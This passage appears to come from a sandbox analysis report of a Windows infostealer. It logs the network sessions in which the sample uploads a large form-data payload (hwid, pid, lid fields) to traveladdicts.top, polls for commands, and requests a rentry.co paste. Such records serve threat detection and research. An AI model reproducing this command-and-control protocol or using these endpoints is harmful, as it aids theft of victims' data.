                                                                                                                                                                  2025-01-28 15:16:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2025-01-28 15:16:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.449773104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:43 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=QQWH8VW3RCPOZ95
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 574203
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 51 51 57
                                                                                                                                                                  Data Ascii: --QQWH8VW3RCPOZ95Content-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--QQWH8VW3RCPOZ95Content-Disposition: form-data; name="pid"1--QQWH8VW3RCPOZ95Content-Disposition: form-data; name="lid"MeHdy4--pl2yan1--QQW
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 75 e4 c6 6f ce 26 16 02 79 7e 50 ea 38 7a fb 54 79 c9 d9 83 98 e7 19 e6 8e c0 5f 82 6e f0 3e 3e 3f ee 87 1c c6 07 dc 1c d2 99 00 14 a6 d4 67 7d 4b 54 e8 f2 b5 99 5e 88 88 e4 f3 46 46 b1 e0 72 03 19 92 bb 81 5e 52 57 9a 3c 4f ea 21 80 23 1b d9 82 35 a2 c9 11 0e ca 95 e1 01 09 c6 77 4a 23 6f 1b 0e 3a 43 76 4a 73 d9 6d 36 b9 e8 71 77 a1 a7 b1 1b ed 50 54 0b 53 8e 7b 45 f4 ef d3 8d 83 41 b0 27 ec ee 39 73 30 bd b6 b4 3e 9c 0f ad 23 61 1e 92 66 db 71 31 8a e3 f6 76 0a 3d 62 55 c9 cf ae d8 34 47 7c 09 f8 26 e2 34 42 99 58 ff 78 03 7d 48 ef f9 a9 78 93 d8 ed bb 82 a4 16 5d 41 8d bf 9a 7a 19 d2 ae ef 1b 3f 60 d7 65 f8 4d 5d 6e e2 43 e4 9e 2f d2 23 7c 07 a2 3d 62 89 97 cd b3 0a 41 81 19 bf 49 e0 05 0e 79 5e f0 b0 5d d3 72 47 8d 70 8e c2 f4 31 be e1 df ae 32 89 fc
                                                                                                                                                                  Data Ascii: uo&y~P8zTy_n>>?g}KT^FFr^RW<O!#5wJ#o:CvJsm6qwPTS{EA'9s0>#afq1v=bU4G|&4BXx}Hx]Az?`eM]nC/#|=bAIy^]rGp12
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: a4 d6 df 51 cc f2 7e 96 d3 aa 6e 3b 12 db dd 9d ae d6 4d e3 4e 0b d9 ee 7a 56 3d 2d d0 e9 a4 76 bd 9a 6e 75 da b2 3f d8 cb 38 dd 20 4f a8 e6 3e fa 76 a5 a1 64 be ea 6e 57 de b7 47 8c 69 d1 98 52 94 6b b2 da 53 fb 59 bf 79 a2 27 1b 82 0e 02 7d 9a ae 8c 7b 7c 9b 4d ca 71 8c af 65 07 17 13 54 d2 10 e4 b4 fd 62 a6 e5 3d 34 5f d9 98 27 82 79 8b a9 13 0f e8 c9 ba 63 27 27 76 69 a1 61 34 21 44 bf 0d 53 de 44 ce fe a0 43 78 b7 79 95 a1 ef 9e 26 c6 8b 7a c7 d3 7f 28 1a 5e a1 3d 2a 67 2f 0f 76 db 84 c8 91 a4 0e 10 dc 4c 7c 28 f2 72 b2 21 51 4b 6f 4d 4f 48 87 ea d8 b5 ea e2 f9 4f ca ef f5 d8 ce 51 6c 6d e6 1d d7 93 6c bf 47 27 f3 dd 53 34 9f 20 8e 17 22 d1 10 df 36 e5 44 38 9f c0 aa 5c d7 82 c0 ee 1a a9 c3 2f 39 e5 0f a3 48 52 28 81 7d fd 4d 44 c1 72 cc ed a8 29 d4
                                                                                                                                                                  Data Ascii: Q~n;MNzV=-vnu?8 O>vdnWGiRkSYy'}{|MqeTb=4_'yc''via4!DSDCxy&z(^=*g/vL|(r!QKoMOHOQlmlG'S4 "6D8\/9HR(}MDr)
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 41 2f 38 3b 3a b4 ed f4 c6 76 da a1 33 6b 71 66 6f ad cf ee 41 30 af f9 88 5e 10 53 00 c9 b6 ce 73 79 a6 48 d3 9f 80 de 43 a0 be 03 94 d6 b5 19 0b c6 35 96 fb 5e 40 d9 8e e3 0e 6a ba d5 77 11 4c b3 e0 26 8d 4c 00 a9 da b5 27 3f 12 e8 dd fb 9a c9 44 04 cb 5e fd df 41 54 31 64 a9 08 ca 24 16 9a dc f2 ae 04 28 c9 44 ef 41 42 7d 19 18 c3 6e 40 2f e4 7d 40 03 83 1d e0 56 24 09 03 25 9d 1b cc 86 b7 5d ab a6 26 ae 18 d8 77 c8 2c 7e 66 64 c7 42 98 d5 b8 2a ed 7d 90 36 b7 cd 92 d0 b2 86 9a 86 bf 1d 54 8a ce d5 a5 0b af 96 80 56 63 f4 a1 c8 c1 48 05 f4 3b 86 8e 10 40 2c 02 c1 16 d5 45 5b 2a fa ac eb 21 72 c1 a1 54 8a bd d7 7a 97 02 4d 71 ed d4 8a da b9 be a8 f4 15 b9 0d 2e 10 88 d2 e2 e7 c8 0b 97 2e 80 09 64 62 39 4f 7a 04 c1 f5 60 ab b5 38 c9 d7 69 78 01 29 fe 4b
                                                                                                                                                                  Data Ascii: A/8;:v3kqfoA0^SsyHC5^@jwL&L'?D^AT1d$(DAB}n@/}@V$%]&w,~fdB*}6TVcH;@,E[*!rTzMq..db9Oz`8ix)K
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 30 38 47 6c ce d6 16 d2 83 48 6f 75 5b 1c d8 bd fe bd 4c 47 29 f2 fd 27 0d 34 18 14 89 99 62 5a d3 82 54 89 2a 51 89 cb 97 84 e3 2b 10 32 cb 13 a6 e4 59 59 ad 87 b3 8d 06 ee 96 66 df 1e 44 5c ef 4c 2b cc 3d 19 f3 c3 a3 60 7b af e7 b4 43 6e e5 0d 26 8e 1e 24 72 06 38 6e c3 4a 8e 65 3d 08 a5 8b 3b e6 56 9d 86 3f b7 4a 8c b1 49 6a ac 5a b1 bc ee 50 15 1a 8a b9 71 06 f7 9f 45 f5 47 5e 06 39 09 e9 25 39 18 a4 3a 7e b1 d2 c1 15 32 5e 60 96 f2 1e e8 63 4c 6c 3c 72 e6 ac e0 bf 6f d0 95 c6 be 38 64 ef c5 93 6c 9d 98 26 4d a9 fe f2 2e 32 10 f2 a9 a7 b7 20 7f c9 b2 ea 66 b7 cd 54 8b ac e2 96 a4 91 57 cd 73 2c cd a7 b8 6d b3 da 91 a2 bb 62 2f 18 17 a5 6c 26 26 ce de ec be 66 05 a7 a6 81 5f 49 79 49 95 b2 8b b1 50 56 d0 9c 13 fc d9 56 6d 99 3f 84 bd 2d 88 16 9e 62 40
                                                                                                                                                                  Data Ascii: 08GlHou[LG)'4bZT*Q+2YYfD\L+=`{Cn&$r8nJe=;V?JIjZPqEG^9%9:~2^`cLl<ro8dl&M.2 fTWs,mb/l&&f_IyIPVVm?-b@
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 8a 75 1c 7a f9 49 9b 4d b8 4a 1a b5 53 29 47 fc a2 26 17 07 91 a6 b8 c3 ba aa 19 d1 81 35 86 61 0d bf 90 05 f2 53 81 2e fa 63 7f d4 4f ee d1 6e 2b 3a ff 35 37 6d a5 70 41 9c 00 7e 39 b4 d6 a2 21 4e 80 53 7c 46 96 a2 74 50 b2 4b 19 4a 7b 1c e8 ed ec d2 24 d0 b4 38 d9 5d 84 c7 bf ad 46 fa be 22 a9 82 df 90 d2 66 04 2c 75 da 5a 78 6e 9e 0e 4e 51 81 0d ad 10 18 f9 4e b4 20 9a d5 49 95 2d bd 0d 90 a6 80 96 ed 20 0a b0 97 0a b2 79 eb da 89 04 20 bb 59 c9 7b a4 46 01 d7 eb bd ef 54 d0 97 d9 7e 2c 0e a4 3c 0a 0f 69 7a 14 7e 09 30 b3 76 83 87 b2 4c ed 22 d9 ff 39 4d 65 90 01 c8 4f f2 8c 93 16 74 31 05 d4 03 4f ce 87 ea 3c 53 ca b9 bc f5 8c 4e e1 37 a9 32 dd 6b b4 50 7d fb 46 11 d6 fb 48 18 3f fb fa 7f e6 82 18 b8 b3 f4 4f 00 03 19 d1 ff 15 64 b6 e0 6a f8 ef 10 34
                                                                                                                                                                  Data Ascii: uzIMJS)G&5aS.cOn+:57mpA~9!NS|FtPKJ{$8]F"f,uZxnNQN I- y Y{FT~,<iz~0vL"9MeOt1O<SN72kP}FH?Odj4
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: ee c4 3d b5 cf ff b3 d0 a2 32 68 38 62 f1 66 ff 20 c4 28 04 48 f3 e2 40 74 57 c6 a0 05 06 ae 2c 06 48 30 78 eb 23 88 c5 c0 a1 b5 d5 5a 00 47 ef 8a 54 64 0a 5d ed 07 b6 99 2e d6 95 80 f4 28 1a ae 50 46 47 5f 9e 94 62 1f d0 ba 6d 90 f3 f5 27 de 07 1b 33 8a 75 3f 5a 18 bd b9 c7 ea 1e 9f 15 20 7b 9e 25 0b 8f 8b af 7f 3e 0f 7b b9 79 6f a4 6e a4 aa 25 e6 9b 18 23 55 5e 39 61 52 3a 75 65 f5 10 d9 c5 5a 10 c8 f1 5f 17 98 56 63 aa e1 a3 ce 53 bc d4 8b 51 b9 ea b6 43 ca 69 e1 aa 88 25 c0 4a 77 1c d8 a2 83 0e 07 54 10 d2 dd e5 df 22 be b4 b1 6f 35 11 6e ad 40 62 db 1c 3a 9e d6 d6 fa e7 c1 39 6a 14 f5 68 4b b7 f2 bd 99 37 75 62 14 42 05 ae 44 03 f3 b3 56 cc 0b b3 92 6f be 9b 03 33 70 8e ec fc b7 27 52 39 94 a3 e6 a7 fd b0 7b f6 1f f4 2b f3 67 f3 f1 8f 80 71 6f 2c 0d
                                                                                                                                                                  Data Ascii: =2h8bf (H@tW,H0x#ZGTd].(PFG_bm'3u?Z {%>{yon%#U^9aR:ueZ_VcSQCi%JwT"o5n@b:9jhK7ubBDVo3p'R9{+gqo,
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 16 cc 2a 51 03 13 b5 94 a6 93 74 e5 f3 6a 65 18 46 e6 66 fa 03 94 b5 74 ae e4 78 73 d0 ea b9 dc f6 53 84 7f 3a 36 3e b5 10 82 31 d5 93 f0 08 51 95 25 04 5a 9d 93 78 2d 3f 12 02 dd 77 f0 9a b7 a5 7b cf 73 d3 59 76 de f0 4f b9 0f 4d 44 b7 68 f4 cd 19 21 a4 c5 d8 52 82 57 cf ed 51 86 94 1f 36 32 c2 33 f6 5a 4f 29 0b 9b 49 6c 2c 85 63 18 46 9f 52 41 1a 2d 45 d3 c4 6f f5 b1 83 7d a7 e4 da 39 50 08 ba eb a1 56 25 e8 7a c8 5d 65 66 56 32 ef a7 ab 57 6b f5 b1 47 0e 48 dc 51 90 96 e2 4f c6 30 0e b7 f8 7a f3 bb bf 59 65 b4 af 77 9b 15 46 08 0a 68 80 ca 8e a3 98 3f ae 0a 56 23 2f 32 3c c9 52 82 72 e1 86 a1 e2 26 f7 d7 f7 e8 42 c0 01 1d f6 f1 38 e5 c8 d5 07 11 0f b0 b8 f4 2c d7 63 61 a1 29 1d 7a f4 cc c0 ef 7f 65 77 6f 04 fe ad 77 cc e9 cc df 8c 03 fb 87 9c 9b b3 56
                                                                                                                                                                  Data Ascii: *QtjeFftxsS:6>1Q%Zx-?w{sYvOMDh!RWQ623ZO)Il,cFRA-Eo}9PV%z]efV2WkGHQO0zYewFh?V#/2<Rr&B8,ca)zewowV
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: 31 8d 94 fa 87 7b 22 1e c9 c4 b2 30 89 be 73 2a 32 c7 92 1c cd 94 4b 04 31 5f f0 c5 da f6 9d 77 ce 31 2d be 20 45 34 09 de a3 ae ae 49 91 0a d0 9e b1 49 57 6a ce 0c e6 7c e9 75 9f dd f8 74 2e 7a 40 a8 38 42 82 78 25 1c 37 aa ff ff fa 11 e4 32 b8 17 14 6b 14 dd 8c a8 7a 5c 8a 8c 82 9d 10 05 c3 fc e6 45 07 da b3 03 f2 09 f5 10 6b e5 1c b4 f6 fc 9d cf d1 df 84 20 0d dc 01 a8 99 d4 76 73 54 7d 12 af f9 33 a7 3c ec 68 86 98 c1 f5 7f 1f f8 07 7d 71 f1 5f bb 1d 3a 94 41 4e 39 b0 9a db 85 6a ce bb d3 fb 72 b2 25 78 cc f8 b0 56 58 43 fd ce 89 57 4b 10 eb a6 61 08 86 31 1a 1e de 02 ca d6 b2 7e 48 83 99 e8 ff 73 9c 87 f2 62 c1 a2 1d 44 bd 61 0a b3 f2 f8 bc 30 62 87 20 ff 4a e2 88 ad 0e 78 1d 95 0c 0d e2 b4 73 95 1f 30 c4 50 bd 5f 53 91 aa 90 ff 6a 5f 8c 59 3c 33 e8
                                                                                                                                                                  Data Ascii: 1{"0s*2K1_w1- E4IIWj|ut.z@8Bx%72kz\Ek vsT}3<h}q_:AN9jr%xVXCWKa1~HsbDa0b Jxs0P_Sj_Y<3
                                                                                                                                                                  2025-01-28 15:16:43 UTC15331OUTData Raw: f4 bf f0 6f 7e f0 f3 77 cf 87 27 d6 81 c0 db 32 fe bb de 85 ad 4f f4 41 d4 50 90 91 3a c8 b0 90 ee bb db ab d5 67 49 0d 73 f3 e3 3f b6 14 77 76 a3 d8 6f 16 d7 40 89 4b 36 a0 a7 9d ce 08 73 43 42 3f 7a cb ce 64 c1 fb 4b e7 9e 19 9c 78 f7 15 ad 7c f9 47 aa 8e f4 1f 83 7f 73 8e 67 30 67 ad fb f2 bd 45 4d 59 ea bb fb 99 a9 d9 91 e2 71 d3 8f 74 76 f0 ad 73 ba 38 47 2a cf 04 56 3e 53 06 33 6a e8 f8 7b 07 d6 b2 93 9c 77 56 1a fd b4 25 1f 77 62 f5 7c 28 fe 74 09 e9 ba 0e 3c df 0c 4d 56 8a 3f 94 07 bd 9f 20 0f 34 5f 47 6c 29 75 cd cc 38 fb b6 98 a9 b7 42 c9 1c dd d3 cc f1 2e 92 26 46 7c 5e b8 e8 91 25 f4 ab 4d 0c 4c 51 fb 2a ca cc b9 af 4c 1f 9e 39 5f 84 4e cc 07 e4 3d e5 bc 24 62 16 20 e8 91 aa a0 50 2f 9b b9 84 1d c0 71 48 69 3d 41 c5 ba 35 e9 bd 9f da 22 a0 ec
                                                                                                                                                                  Data Ascii: o~w'2OAP:gIs?wvo@K6sCB?zdKx|Gsg0gEMYqtvs8G*V>S3j{wV%wb|(t<MV? 4_Gl)u8B.&F|^%MLQ*L9_N=$b P/qHi=A5"
                                                                                                                                                                  2025-01-28 15:16:56 UTC1140INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:56 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=a9prpt5ov783db7jdv05qmc9am; expires=Sat, 24 May 2025 09:03:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzNDDPWhwjxAr0uPuBx3vQmGYdZBDtD2%2BnaDQq9DcapLG1IyVcOMOxe%2Fh2uDV0JgcF9LhPPDpAc%2BXDzf8OKIv6SkISnn0lulIZvIHaNgEYgBWuS6YHFw5Oxjvl7s2%2FlEwruZ9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f1f97f1f0fa5-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1548&rtt_var=586&sent=306&recv=593&lost=0&retrans=0&sent_bytes=2841&recv_bytes=576748&delivery_rate=1859872&cwnd=196&unsent_bytes=0&cid=361f515b3616fa52&ts=13454&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.449859104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:57 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 84
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:57 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d 26 68 77 69 64 3d 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31
                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl2yan1&j=&hwid=8F80B2DB807DDED22F2109764D00B0F1
                                                                                                                                                                  2025-01-28 15:16:57 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:57 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=4cl4l4vdghkf28ij6feu0ncm6q; expires=Sat, 24 May 2025 09:03:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMZju9vQIG8Tkzizbfz7E%2BmjOAfHGPZibSrKyerBXFoZ%2BbCRlMOAZ5kGhoOsfOSiVVO4Lxt5WIBCCwP0XYFWf13VjehpgCwHTC9E5YK9CsdkQOlJ%2BBurLn3hhbHE%2B5r3bKt1uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f25189a07d16-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2021&rtt_var=773&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1403171&cwnd=223&unsent_bytes=0&cid=9e192eddd68b064a&ts=467&x=0"
                                                                                                                                                                  2025-01-28 15:16:57 UTC126INData Raw: 37 38 0d 0a 70 6d 76 66 31 4f 72 2f 42 6d 58 51 4e 73 64 6a 49 4b 69 42 6e 62 6d 77 4c 59 2b 37 41 39 44 6f 6c 58 64 66 46 33 31 41 6a 56 6a 39 45 50 32 68 79 4d 55 6b 44 61 52 43 74 78 41 61 39 4b 37 42 6c 73 4a 49 34 63 39 78 71 63 62 32 47 41 4d 34 47 79 58 69 4c 63 4d 63 75 75 47 32 30 48 51 45 70 78 54 72 51 55 62 63 6f 36 65 4c 6e 41 2f 71 6d 54 6e 67 6c 63 67 3d 0d 0a
                                                                                                                                                                  Data Ascii: 78pmvf1Or/BmXQNsdjIKiBnbmwLY+7A9DolXdfF31AjVj9EP2hyMUkDaRCtxAa9K7BlsJI4c9xqcb2GAM4GyXiLcMcuuG20HQEpxTrQUbco6eLnA/qmTnglcg=
                                                                                                                                                                  2025-01-28 15:16:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.449865104.26.3.164437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:58 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Host: rentry.co
                                                                                                                                                                  2025-01-28 15:16:58 UTC888INHTTP/1.1 404 Not Found
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  vary: Origin
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Nl%2FOiUN2xBWBqiUNgSb5PT7VUdwXry3loUljxHyWscxM0Yzf2lafKKpUcYhRkA46s5qZCT799YYEFDaANaf7vlHpO7Z8AN3WqquBHRbUoAnR5s3z94LCCKZFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f2576b0b0f9f-EWR
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1682&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1724748&cwnd=220&unsent_bytes=0&cid=349f066075c46494&ts=317&x=0"
                                                                                                                                                                  2025-01-28 15:16:58 UTC481INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                  Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                                                                                                  2025-01-28 15:16:58 UTC1369INData Raw: 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e
                                                                                                                                                                  Data Ascii: d editing." /> <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" con
                                                                                                                                                                  2025-01-28 15:16:58 UTC1369INData Raw: 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63
                                                                                                                                                                  Data Ascii: scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; sc
